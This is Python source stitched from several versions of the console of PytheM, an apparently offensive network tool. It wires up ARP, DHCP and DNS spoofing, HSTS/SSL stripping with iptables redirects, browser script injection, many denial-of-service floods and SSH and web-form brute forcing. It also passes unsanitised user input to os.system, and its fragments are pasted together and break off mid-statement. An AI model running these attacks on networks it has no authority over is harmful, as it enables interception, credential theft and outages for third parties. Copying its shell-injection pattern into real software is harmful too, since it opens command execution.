def start(self): try: animation = "|/-\\" for i in range(15): time.sleep(0.1) sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + "PytheM is loading ...") sys.stdout.flush() print #Untill break or CTRL+C while 1: #f = open("{}/.PytheM_history".format(self.path),"w") os.system("touch .PytheM_history") #Call the object Completer code in modules/ completer = Completer(self.path,"pythem") #Use termocolor import to set the default commandline red console = termcolor.colored("pythem>","red", attrs=["bold"]) #Iterable console shell commands with the while 1 self.command = raw_input("{} ".format(console)) os.system("echo {} >> .PytheM_history".format(self.command)) #f.write(self.command) #f.close() # Separate the user input by spaces " ", can use like this too: self.input_list = [str(a) for a in self.argv] self.input_list = self.command.split() try: # HELP if self.command == "help": print_help() # EXIT elif self.command == "exit" or self.command == "quit": print "[*] User requested shutdown." if self.dnsdrop_status == 1: self.dos.dnsdropstop() if self.sslkill_status == True: print "[*] SSLKill finalized." os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") os.system('iptables -t nat -F') if self.arpspoof_status == True: iptables() set_ip_forwarding(0) exit() # HSTSBYPASS elif self.command == "hstsbypass": from modules.sslkill import Proxy,SSLKiller,SSLStripRequestHandler def HSTSbypass(): sslkill = SSLKiller(self.interface, self.targets, self.gateway) Proxy(HandlerClass=SSLStripRequestHandler) if self.targets and self.gateway and self.interface: try: self.sslkill_status = True os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080") ht = threading.Thread(name='HSTSbypass', target=HSTSbypass) ht.setDaemon(True) ht.start() sleep(5) #print "[*] SSLKill initialized" #print " |_by: m4n3dw0lf" except Exception as e: print "[!] Exception caught: {}".format(e) else: print "[!] You need to set a target, interface and gateway before starting SSLKill." elif self.command == "hstsbypass help": print "\n[Help] Start to perform a HSTS Bypass with SSLKill" print "[Required] Interface, Gateway and Target" print "example:" print "{} set interface eth0".format(console) print "{} set gateway".format(console) print "{} set target".format(console) print "{} hstsbypass\n".format(console) elif self.input_list[0] == "set" or self.input_list[0] == "SET": try: if self.input_list[1] == "interface": try: self.interface = self.input_list[2] except IndexError: try: self.interface = raw_input("[+] Enter the interface: ") except KeyboardInterrupt: pass elif self.input_list[1] == "port": try: self.port = int(self.input_list[2]) except IndexError: try: self.port = input("[+] Enter the default port: ") except KeyboardInterrupt: pass elif self.input_list[1] == "domain": try: self.domain = self.input_list[2] except IndexError: try: self.domain = raw_input("[+] Domain to be spoofed: ") except KeyboardInterrupt: pass elif self.input_list[1] == "redirect": try: self.redirect = self.input_list[2] except IndexError: try: self.redirect = raw_input("[+] IP address to redirect DNS queries: ") except KeyboardInterrupt: pass elif self.input_list[1] == "script": try: self.script = self.input_list[2] except IndexError: try: self.script = raw_input("[+]Script url/path: ") except KeyboardInterrupt: pass elif self.input_list[1] == "gateway": try: self.gateway = self.input_list[2] except IndexError: try: self.gateway = raw_input("[+] Enter the gateway: ") except KeyboardInterrupt: pass elif self.input_list[1] == "target": try: self.targets = self.input_list[2] except IndexError: try: self.targets = raw_input("[+] Enter the target(s): ") except KeyboardInterrupt: pass elif self.input_list[1] == "file": try: self.file = self.input_list[2] except IndexError: try: self.file = raw_input("[+] Enter the path to the file: ") except KeyboardInterrupt: pass elif self.input_list[1] == "filter": try: self.filter = self.input_list[2] except IndexError: try: self.filter = raw_input("[+] Enter the sniffer filter: ") except KeyboardInterrupt: pass elif self.input_list[1] == "help": print "\n[Help] Select a variable to set." print "parameters:" print " - interface" print " - gateway" print " - target" print " - file" print " - domain" print " - redirect" print " - script" print " - filter" print "example:" print "{} set interface\n".format(console) except IndexError: print "[!] Select a valid variable to set." elif self.input_list[0] == "print": try: if self.input_list[1] == "interface": print "[+] Network Interface: {}".format(self.interface) elif self.input_list[1] == "port": print "[+] Default port: {}".format(self.port) elif self.input_list[1] == "domain": print "[+] Domain: {}".format(self.domain) elif self.input_list[1] == "redirect": print "[+] Redirecting to: {}".format(self.redirect) elif self.input_list[1] == "script": print "[+] Script url/path: {}".format(self.script) elif self.input_list[1] == "gateway": print "[+] Gateway IP Address: {}".format(self.gateway) elif self.input_list[1] == "target": print "[+] Target(s): {}".format(self.targets) elif self.input_list[1] == "file": print "[+] File path: {}".format(self.file) elif self.input_list[1] == "help": print "\n[Help] Print a variable value." print "example:" print "{} print interface\n".format(console) except IndexError: print "[!] Select a valid variable name." elif self.input_list[0] == "scan": try: if self.input_list[1] == "help": print "\n[Help] Start a scanner in target host." print "[Required] interface and target" print "parameters:" print " - tcp" print " - arp" print " - manual" print "example:" print "{} set target".format(console) print "{} set interface eth0".format(console) print "{} scan tcp\n".format(console) continue mode = self.input_list[1] if self.targets is not None and self.interface is not None: from modules.scanner import Scanner self.scan = Scanner(self.targets, self.interface, mode) self.scan.start() else: print "[!] You probably forgot to set the interface or a valid IP address/range." except IndexError: try: print "[*] Select one scan mode, options = tcp/arp/manual" mode = raw_input("[+] Scan mode: ") except KeyboardInterrupt: pass if self.targets is not None and self.interface is not None: from modules.scanner import Scanner self.scan = Scanner(self.targets, self.interface, mode) self.scan.start() else: print "[!] You probably forgot to set the interface or a valid IP address/range." pass except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "arpspoof": try: if self.input_list[1] == "start": from modules.arpoisoner import ARPspoof myip = get_myip(self.interface) mymac = get_mymac(self.interface) self.arpspoof_status = True self.spoof = ARPspoof(self.gateway, self.targets, self.interface, myip, mymac) self.spoof.start() print "[+] ARP spoofing initialized." elif self.input_list[1] == "stop": self.spoof.stop() self.arpspoof_status = False print "[+] ARP spoofing finalized." elif self.input_list[1] == "status": if self.arpspoof_status: stat = "running" else: stat = "down" print "[*] ARP spoofing status: {}".format(stat) elif self.input_list[1] == "help": print "\n[Help] Start a ARP spoofing attack." print print "parameters:" print " - start" print " - stop" print " - status" print " - help" print "example:" print "{} set interface eth0".format(console) print "{} set gateway".format(console) print "{} arpspoof start\n".format(console) continue else: print "[!] Select a valid option, call help to check syntax." except TypeError: print "[!] You probably forgot to set interface or gateway." except IndexError: print "[!] You probably forgot to type start or stop after arpspoof." except AttributeError: pass except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dhcpspoof": try: if self.input_list[1] == "start": from modules.dhcpoisoner import DHCPspoof self.dhcpspoof_status = True self.dhcpspoof = DHCPspoof("silent") print "[+] DHCP spoofing initialized." elif self.input_list[1] == "stop": print "[+] DHCP spoofing finalized." exit(0) elif self.input_list[1] == "status": if self.dhcpspoof_status: stat = "running" else: stat = "down" print "[*] DHCP spoofing status: {}".format(stat) elif self.input_list[1] == "help": print "\n[Help] Start a DHCP ACK Injection spoofing attack." print "parameters:" print " - start" print " - stop" print " - status" print " - help" print "example:" print "{} dhcpspoof start\n".format(console) continue else: print "[!] Select a valid option, call help to check syntax." except IndexError: print "[!] You probably forgot to type start, stop, status or help after dhcpspoof." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dnsspoof": try: if self.input_list[1] == "start": if not self.arpspoof_status: print "[!] You probably forgot to start an ARP spoofing." continue if self.domain != None : domain = self.domain else: try: domain = raw_input("[!] Type all to spoof all domains\n[+] Domain to be spoofed: ") self.domain = domain except KeyboardInterrupt: pass if self.redirect != None: redirect = self.redirect else: myip = get_myip(self.interface) opt = raw_input("[+] Default address to redirect is:{} do you want to change?[y/n]".format(myip)) if opt == "y" or opt == "Y" or opt == "yes" or opt == "YES": try:redirect = raw_input("[+] IP address to be redirected: ") except KeyboardInterrupt: pass else: redirect = myip from modules.dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(redirect) self.dnsspoof.start(domain,None) print "[+] DNS spoofing initialized" self.dnsspoof_status = True elif self.input_list[1] == "stop": self.dnsspoof.stop() self.dnsspoof_status = False print "[+] DNS spoofing finalized" elif self.input_list[1] == "status": if self.dnsspoof_status: stat = "running" else: stat = "down" print "[*] DNS spoofing status: {}".format(stat) elif self.input_list[1] == "help": print "\n[Help] Start to DNS spoof." print "[Required] ARP spoof started." print "parameters:" print " - start" print " - stop" print " - status" print " - help" print "example:" print "{} dnsspoof start".format(console) print "[!] Type all to spoof all domains" print "[+] Domain to be spoofed:\n" continue else: print "[!] Select a valid option, call help to check syntax." except IndexError: print "[!] You probably forgot to type start or stop after dnsspoof." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "redirect": try: if self.input_list[1] == "start": myip = get_myip(self.interface) try: from modules.redirect import Redirect self.redirect = Redirect(myip,self.port,self.script) self.redirect_status = True self.redirect.server() except AttributeError: print "\n[!] Select a valid script source path or url." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "stop": try: self.redirect.stop() self.redirect_status = False except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "status": if self.redirect_status: stat = "running" else: stat = "down" print "[*] Script redirect status: {}".format(stat) elif self.input_list[1] == "help": print "\n[Help] Start to inject a source script into target browser then redirect to original destination." print "[Required] ARP spoof started." print "parameters:" print " - start" print " - stop" print " - status" print " - help" print "example:" print "{} redirect start".format(console) print "[+] Enter the script source:\n" continue else: print "[!] You need to specify start, stop or status after the redirect module call." except IndexError: print "[!] You probably forgot to start or stop the redirect module." except TypeError: print "[!] You probably forgot to start an arpspoof attack ." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dos": from modules.jammer import Jam self.dos = Jam() try: if self.input_list[1] == "dnsdrop": try: if self.input_list[2] == "help": print "\n[Help] Start to drop DNS queries that pass through man-in-the-middle traffic." print "[Required] ARP spoof started" print "example:" print "{} dos dnsdrop\n".format(console) continue except IndexError: if self.arpspoof_status: try: myip = get_myip(self.interface) self.dos.dnsdropstart(myip) self.dnsdrop_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) else: print "[!] You need to start a arpspoof on a target (IP/Range) to start dnsdrop." elif self.input_list[1] == "dnsamplification": try: if self.input_list[2] == "help": print "\n[Help] Start a DNS amplification attack on target address with given DNS servers to amplificate." print "example:" print "{} set target".format(console) print "{} dos dnsamplification".format(console) print "[+] DNS Server to use in amplification attack(separated by commas):,\n" except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: self.dos.dnsamplificationstart(self.targets) self.dnsamplification_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "dhcpstarvation": try: if self.input_list[2] == "help": print "\n[Help] Start a DHCP starvation attack on network DHCP server. Multiple spoofed mac dhcp discovers." print "example:" print "{} dos dhcpstarvation\n".format(console) continue except IndexError: try: self.dos.dhcpstarvationstart() self.dhcpstarvation_status = 1 except TypeError: print "[!] You probably forgot to set a network interface." elif self.input_list[1] == "land": try: if self.input_list[2] == "help": print "\n[Help] Start a LAND attack on a target." print "[Required] Target" print "[Optional] Port, default = 80" print "example:" print "{} set target".format(console) print "{} dos land\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: self.dos.landstart(self.targets,self.port) self.land_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "pingofdeath": try: if self.input_list[2] == "help": print "\n[Help] Start a Ping of Death attack on a target." print "[Required] Target" print "example:" print "{} set target".format(console) print "{} dos pingofdeath\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: self.dos.pingofdeathstart(self.targets) self.pingofdeath_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "udpflood": try: if self.input_list[2] == "help": print "\n[Help] Start a UDP flood attack on target host, default port = 80, set port to change." print "[Required] Target" print "[Optional] port" print "example:" print "{} set target".format(console) print "{} dos synflood\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: myip = get_myip(self.interface) self.dos.udpfloodstart(myip,self.targets,self.port) self.udpflood_status = 1 except TypeError: print "[!] You probably forgot to set a network interface." elif self.input_list[1] == "icmpflood": try: if self.input_list[2] == "help": print "\n[Help] Start a ICMP flood attack on target host." print "[Required] Target and interface" print "example:" print "{} set target".format(console) print "{} set interface wlan0".format(console) print "{} dos icmpflood\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: myip = get_myip(self.interface) self.dos.icmpfloodstart(myip,self.targets) self.icmpflood_status = 1 except TypeError: print "[!] You probably forgot to set a network interface." elif self.input_list[1] == "synflood": try: if self.input_list[2] == "help": print "\n[Help] Start a SYN flood attack on target host, default port = 80, set port to change." print "[Required] Target and interface" print "[Optional] port" print "example:" print "{} set target".format(console) print "{} set interface wlan0".format(console) print "{} dos synflood\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: myip = get_myip(self.interface) self.dos.synfloodstart(myip,self.targets,self.port) self.synflood_status = 1 except TypeError: print "[!] You probably forgot to set a network interface." elif self.input_list[1] == "icmpsmurf": try: if self.input_list[2] == "help": print "\n[Help] Start a ICMP smurf attack on target host. send echo-requests with spoofed target address." print "[Required] Target and interface" print "example:" print "{} set target".format(console) print "{} set interface wlan0".format(console) print "{} dos icmpsmurf\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: self.dos.icmpsmurfstart(self.targets) self.icmpsmurf_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "teardrop": try: if self.input_list[2] == "help": print "\n[Help] Start a UDP teardrop fragmentation attack." print "[Required] Target and interface" print "example:" print "{} set interface wlan0".format(console) print "{} set target".format(console) print "{} dos teardrop\n".format(console) continue except IndexError: if self.targets == None: print "[!] You probably forgot to set a IP address as target." else: try: self.dos.teardrop(self.targets) self.teardrop_status = 1 except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "help": print "\n[Help] Start to perform a choosen denial of service in target." print "[Required] Depends" print "parameters:" print " - dnsdrop" print " - synflood" print " - udpflood" print " - teardrop" print " - icmpflood" print " - icmpsmurf" print " - dhcpstarvation" print " - dnsamplification" print "example:" print "{} dos icmpsmurf help\n".format(console) else: print "[!] Select a valid option, type help to check syntax." except IndexError: print "[!] You probably forgot to specify the type of DoS to use." elif self.command == "sniff help": if self.input_list[1] == "help": print "\n[Help] Start to sniff network traffic with custom scapy filter." print "[Required] Interface" print "[Optional] Filter in tcpdump format" print "[Custom filters]:" print " - http (Quick 'port 80')" print " - dns (Quick 'port 53')" print " - core (Core network events)" print "examples:" print "{} set interface wlan0".format(console) print "{} sniff port 1337 and host\n".format(console) continue elif self.input_list[0] == "sniff": from modules.sniffer import Sniffer try: hasfilter = self.input_list[1] self.filter = " ".join(self.input_list[1:]) if self.filter == "dns": self.filter = "port 53" self.sniff = Sniffer(self.interface, self.filter,self.path) print "\n[+] PytheM sniffer initialized.\n" self.sniff.start() except IndexError: try: self.filter = raw_input("[+] Enter the filter(empty for core sniffer): ") if self.filter == "dns": self.filter = "port 53" if not self.filter: self.filter = None self.sniff = Sniffer(self.interface, self.filter,self.path) print "\n[+] PytheM sniffer initialized.\n" self.sniff.start() except KeyboardInterrupt: pass elif self.input_list[0] == "pforensic": try: if self.input_list[1] == "help": print "\n[Help] Start a packet-analyzer." print "[Required] Set a file with a .pcap file" print "example:" print "{} set file capture.pcap".format(console) print "{} pforensic\n".format(console) continue else: print "[!] Invalid option." except IndexError: try: from modules.pforensic import PcapReader self.pcapread = PcapReader(self.file) self.pcapread.start() except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the .pcap file" pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "xploit": try: from modules.xploit import Exploit if self.targets is not None and self.input_list[1] == "tcp": self.xploit = Exploit(self.targets, self.input_list[1]) self.xploit.start() elif self.file is not None and self.input_list[1] == "stdin": self.xploit = Exploit(self.file, self.input_list[1]) self.xploit.start() elif self.input_list[1] == "help": print "\n[Help] Interactive stdin or tcp exploit development shell." print "[Required] File as target to stdin and IP address as target to tcp" print "parameters:" print " - tcp" print " - stdin" print "example:" print "{} set target".format(console) print "{} xploit tcp\n".format(console) else: print "[!] You need to set or stdin or tcp as argument." print "[!] You need to set or a |-file or |-target to xploit." except IndexError: try: print "[*] Select one xploit mode, options = stdin/tcp" mode = raw_input("[+] Exploit mode: ") if mode == "stdin" or mode == "tcp": from modules.exploit import Exploit if self.targets is not None: self.xploit = Exploit(self.targets, mode) self.xploit.start() elif self.file is not None: self.xploit = Exploit(self.file, mode) self.xploit.start() else: print "[!] You need to set or a file or a target to xploit." else: print "[!] Select a valid xploit mode, stdin or tcp" except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the file" pass except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "cookiedecode": try: try: if self.input_list[1] == "help": print "\n[Help] Decode a base64 unquoted Cookie." print "example:" print "{} cookiedecode".format(console) print "[+] Enter the cookie value:\n" except IndexError: cookiedecode() except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "decode": try: if self.input_list[1] == "help": print "\n[Help] Decode a base64 string." print "example:" print "{} decode".format(console) print "[+] Decode: <encoding>" print "[+] Enter the string to be decoded:\n" continue print decode(self.input_list[1]) except IndexError: try: msg = raw_input("[+] Decode: ") print decode(msg) except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "encode": try: if self.input_list[1] == "help": print "\n[Help] Encode a base64 string." print "example:" print "{} encode".format(console) print "[+] Encode: <encoding>" print "[+] Enter the string to be encoded:\n" continue print encode(self.input_list[1]) except IndexError: try: msg = raw_input("[+] Encode:") print decode(msg) except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "geoip": try: if self.input_list[1] == "help": print "\n[Help] Approximately geolocate the location of a IP address." print "[Required] Target IP Address" print "examples:" print "{} set target".format(console) print "{} geoip".format(console) print " or" print "{} geoip\n".format(console) continue self.targets = self.input_list[1] from modules.geoip import Geoip path = self.path + "/config/GeoLiteCity.dat" iptracker = Geoip(self.targets,path) except IndexError: if self.targets is not None: from modules.geoip import Geoip path = self.path + "/config/GeoLiteCity.dat" iptracker = Geoip(self.targets,path) else: print "[!] You probably forgot to set a target" except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "brute": try: if self.input_list[1] == "help": print "\n[Help] Brute-Force attacks, good luck padawan." print "[Required] File as password wordlist and target as URL or IP." print "parameters:" print " - ssh" print " - form" print " - url" print "example:" print "{} brute ssh help\n".format(console) continue if self.input_list[1] == "ssh": try: if self.input_list[2] == "help": print "\n[Help] SSH Brute-Force" print "[Required] IP address as target." print "example:" print "{} set file wordlist.txt".format(console) print "{} set target".format(console) print "{} brute ssh\n".format(console) continue else: print "[!] Invalid option." except IndexError: try: username = raw_input("[+] Enter the username to bruteforce: ") from modules.ssh_bruter import SSHbrutus brutus = SSHbrutus(self.targets, username, self.file) brutus.start() except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "url": try: if self.input_list[2] == "help": print "\n[Help] URL Brute-Force" print "[Required] URL (with http:// or https://) as target" print "example:" print "{} set file wordlist.txt".format(console) print "{} set target".format(console) print "{} brute url\n".format(console) continue else: print "[!] Invalid option." except IndexError: try: url = 'url' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(url) except KeyboardInterrupt: brutus.stop(url) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "form": try: if self.input_list[2] == "help": print "\n[Help] Formulary Brute-Force" print "[Required] URL (with http:// or https://) as target" print "example:" print "{} set file wordlist.txt".format(console) print "{} set target".format(console) print "{} brute form\n".format(console) continue else: print "[!] Invalid option." except IndexError: try: form = 'form' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(form) except KeyboardInterrupt: brutus.stop(form) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass except IndexError: print "[!] Select a valid brute force type." else: try: os.system("{}".format(self.command)) pass except Exception as e: print "[!] Select a valid option, type help to check syntax." pass except IndexError: pass except Exception as e: print "[!] Exception caught: {}".format(e) except KeyboardInterrupt: print "\n[*] User requested shutdown." if self.dnsdrop_status == 1: self.dos.dnsdropstop() if self.sslkill_status == True: print "[*] SSLKill finalized." os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") os.system('iptables -t nat -F') if self.arpspoof_status == True: iptables() set_ip_forwarding(0) exit()
else: print "[!] Select a valid IP address/range as target with -t ." sys.exit(0) except KeyboardInterrupt: print "[*] User requested shutdown." sys.exit(1) elif args.arpspoof and args.sniff: try: myip = get_myip(interface) mymac = get_mymac(interface) from modules.arpoisoner import ARPspoof spoof = ARPspoof(gateway, targets, interface, arpmode, myip, mymac) spoof.start() from modules.sniffer import Sniffer sniff = Sniffer(interface, filter) sniff.start() except KeyboardInterrupt: spoof.stop() print "[*] User requested shutdown." sys.exit(1) elif args.arpspoof and args.dnsspoof: try: myip = get_myip(interface) mymac = get_mymac(interface) from modules.arpoisoner import ARPspoof spoof = ARPspoof(gateway, targets, interface, arpmode, myip, mymac) spoof.start() filter = "http" from modules.dnspoisoner import DNSspoof
def start(self): try: while 1: completer = Completer("pythem") console = termcolor.colored("pythem>", "red", attrs=["bold"]) self.command = raw_input("{} ".format(console)) self.argv = self.command.split() self.input_list = [str(a) for a in self.argv] try: if self.input_list[0] == "help": print_help() elif self.command == "jarvis": self.Jarvis.start('core/') self.jarvis_status = 1 elif self.input_list[0] == "jarvis": if self.input_list[1] == "log": try: jarvislog = self.input_list[2] try: os.system( "tail -f log/jarvis{}.txt".format( jarvislog)) except Exception as e: print "[!] Exception caught: {}".format(e) pass except IndexError: print "[+] Jarvis log system." print "[.] Error log - type: err" print "[.] Output log - type: out" try: jarvislog = raw_input("[+] Select: ") os.system( "tail -f log/jarvis{}.txt".format( jarvislog)) except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[1] == "help": jarvis_help(self.Jarvis.version) elif self.input_list[1] == "say": try: message = self.input_list[2] all_msg = " ".join(self.input_list[2:]) self.Jarvis.Say(all_msg) except IndexError: try: message = raw_input("[+] Jarvis speaker: ") self.Jarvis.Say(message) except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "read": try: file = self.input_list[2] self.Jarvis.Read(file) except IndexError: if self.file is not None: self.Jarvis.Read(self.file) else: file = "[+] Set file path:" pass except TypeError: print "[!] You probably forgot to set a wordlist file path." pass except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) else: self.Jarvis.start('core/') self.jarvis_status = 1 elif self.command == "exit" or self.command == "quit": if self.jarvis_status == 1: self.Jarvis.Say(self.Jarvis.random('salutes')) self.Jarvis.stop() exit() else: exit() elif self.input_list[0] == "set" or self.input_list[ 0] == "SET": if self.input_list[1] == "interface": try: self.interface = self.input_list[2] except IndexError: try: self.interface = raw_input( "[+] Enter the interface: ") except KeyboardInterrupt: pass elif self.input_list[1] == "port": try: self.port = int(self.input_list[2]) except IndexError: try: self.port = input( "[+] Enter the default port: ") except KeyboardInterrupt: pass elif self.input_list[1] == "domain": try: self.domain = self.input_list[2] except IndexError: try: self.domain = raw_input( "[+] Domain to be spoofed: ") except KeyboardInterrupt: pass elif self.input_list[1] == "redirect": try: self.redirect = self.input_list[2] except IndexError: try: self.redirect = raw_input( "[+] IP address to redirect DNS queries: " ) except KeyboardInterrupt: pass elif self.input_list[1] == "script": try: self.script = self.input_list[2] except IndexError: try: self.script = raw_input( "[+]Script url/path: ") except KeyboardInterrupt: pass elif self.input_list[1] == "gateway": try: self.gateway = self.input_list[2] except IndexError: try: self.gateway = raw_input( "[+] Enter the gateway: ") except KeyboardInterrupt: pass elif self.input_list[1] == "target": try: self.targets = self.input_list[2] except IndexError: try: self.targets = raw_input( "[+] Enter the target(s): ") except KeyboardInterrupt: pass elif self.input_list[1] == "file": try: self.file = self.input_list[2] except IndexError: try: self.file = raw_input( "[+] Enter the path to the file: ") except KeyboardInterrupt: pass elif self.input_list[1] == "arpmode": try: self.arpmode = self.input_list[2] except IndexError: try: self.arpmode = raw_input( "[+] Enter the arpmode: ") except KeyboardInterrupt: pass elif self.input_list[1] == "filter": try: self.filter = self.input_list[2] except IndexError: try: self.filter = raw_input( "[+] Enter the sniffer filter: ") except KeyboardInterrupt: pass else: print "[!] Select a valid variable to set." elif self.input_list[0] == "print": if self.input_list[1] == "interface": print "[+] Network Interface: {}".format( self.interface) elif self.input_list[1] == "port": print "[+] Default port: {}".format(self.port) elif self.input_list[1] == "domain": print "[+] Domain: {}".format(self.domain) elif self.input_list[1] == "redirect": print "[+] Redirecting to: {}".format( self.redirect) elif self.input_list[1] == "script": print "[+] Script url/path: {}".format(self.script) elif self.input_list[1] == "gateway": print "[+] Gateway IP Address: {}".format( self.gateway) elif self.input_list[1] == "target": print "[+] Target(s): {}".format(self.targets) elif self.input_list[1] == "file": print "[+] File path: {}".format(self.file) elif self.input_list[1] == "arpmode": print "[+] ARP spoofing mode: {}".format( self.arpmode) else: print "[-] Select a valid variable name." elif self.input_list[0] == "scan": try: mode = self.input_list[1] if self.targets is not None and self.interface is not None: from modules.scanner import Scanner self.scan = Scanner(self.targets, self.interface, mode) self.scan.start() else: print "[!] You probably forgot to set the interface or a valid IP address/range." except IndexError: try: print "[*] Select one scan mode, options = tcp/arp/manual" mode = raw_input("[+] Scan mode: ") except KeyboardInterrupt: pass if self.targets is not None and self.interface is not None: from modules.scanner import Scanner self.scan = Scanner(self.targets, self.interface, mode) self.scan.start() else: print "[!] You probably forgot to set the interface or a valid IP address/range." pass except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "arpspoof": try: if self.input_list[1] == "start": from modules.arpoisoner import ARPspoof myip = get_myip(self.interface) mymac = get_mymac(self.interface) self.arpspoof_status = True self.spoof = ARPspoof(self.gateway, self.targets, self.interface, self.arpmode, myip, mymac) self.spoof.start() print "[+] ARP spoofing initialized." elif self.input_list[1] == "stop": self.spoof.stop() self.arpspoof_status = False print "[+] ARP spoofing finalized." elif self.input_list[1] == "status": if self.arpspoof_status: stat = "running" else: stat = "down" print "[*] ARP spoofing status: {}".format( stat) else: print "[!] Select a valid option, call help to check syntax." except TypeError: print "[!] You probably forgot to set interface or gateway." except IndexError: print "[!] You probably forgot to type start or stop after arpspoof." except AttributeError: pass except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dnsspoof": try: if self.input_list[1] == "start": if not self.arpspoof_status: print "[!] You probably forgot to start an ARP spoofing." continue if self.domain != None: domain = self.domain else: try: domain = raw_input( "[!] Type all to spoof all domains\n[+] Domain to be spoofed: " ) self.domain = domain except KeyboardInterrupt: pass if self.redirect != None: redirect = self.redirect else: myip = get_myip(self.interface) opt = raw_input( "[+] Default address to redirect is:{} do you want to change?[y/n]" .format(myip)) if opt == "y" or opt == "Y" or opt == "yes" or opt == "YES": try: redirect = raw_input( "[+] IP address to be redirected: " ) except KeyboardInterrupt: pass else: redirect = myip from modules.dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(redirect) self.dnsspoof.start(domain, None) print "[+] DNS spoofing initialized" self.dnsspoof_status = True elif self.input_list[1] == "stop": self.dnsspoof.stop() print "[+] DNS spoofing finalized" elif self.input_list[1] == "status": if self.dnsspoof_status: stat = "running" else: stat = "down" print "[*] DNS spoofing status: {}".format( stat) else: print "[!] Select a valid option, call help to check syntax." except IndexError: print "[!] You probably forgot to type start or stop after dnsspoof." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "inject": try: if self.input_list[1] == "start": myip = get_myip(self.interface) try: from modules.inject import Inject self.inject = Inject( myip, self.port, self.script) self.inject_status = True self.inject.server() except AttributeError: print "\n[!] Select a valid script source path or url." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "stop": try: self.inject.stop() self.inject_status = False except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[1] == "status": if self.inject_status: stat = "running" else: stat = "down" print "[*] Script injection status: {}".format( stat) else: print "[!] You need to specify start, stop or status after the inject module call." except IndexError: print "[!] You probably forgot to start or stop the inject module." except TypeError: print "[!] You probably forgot to start an arpspoof attack ." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dos": from modules.jammer import Jam self.dos = Jam() try: if self.input_list[1] == "mitmdrop": if self.arpspoof_status: try: myip = get_myip(self.interface) self.dos.mitmdropstart(myip) self.mitmdrop_status = 1 except Exception as e: print "[!] Exception caught: {}".format( e) else: print "[!] You need to start a arpspoof on a target (IP/Range) to start mitmdrop." elif self.input_list[1] == "stop": if self.mitmdrop_status == 1: self.dos.mitmdropstop() else: print "[!] You need to start a DoS attack before call stop." else: print "[!] Select a valid option, type help to check syntax." except IndexError: print "[!] You probably forgot to specify the type of DoS to use." elif self.input_list[0] == "sniff": from modules.sniffer import Sniffer try: hasfilter = self.input_list[1] self.filter = " ".join(self.input_list[1:]) if self.filter == "http": self.filter = "port 80" elif self.filter == "dns": self.filter = "port 53" self.sniff = Sniffer(self.interface, self.filter) self.sniff.start() except IndexError: try: self.filter = raw_input( "[+] Enter the filter: ") if self.filter == "http": self.filter = "port 80" elif self.filter == "dns": self.filter = "port 53" if not self.filter: self.filter = None self.sniff = Sniffer(self.interface, self.filter) self.sniff.start() except KeyboardInterrupt: pass elif self.command == "pforensic": try: completer = None completer = Completer("pforensic") from modules.pforensic import PcapReader self.pcapread = PcapReader(self.file) self.pcapread.start() except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the .pcap file" pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == 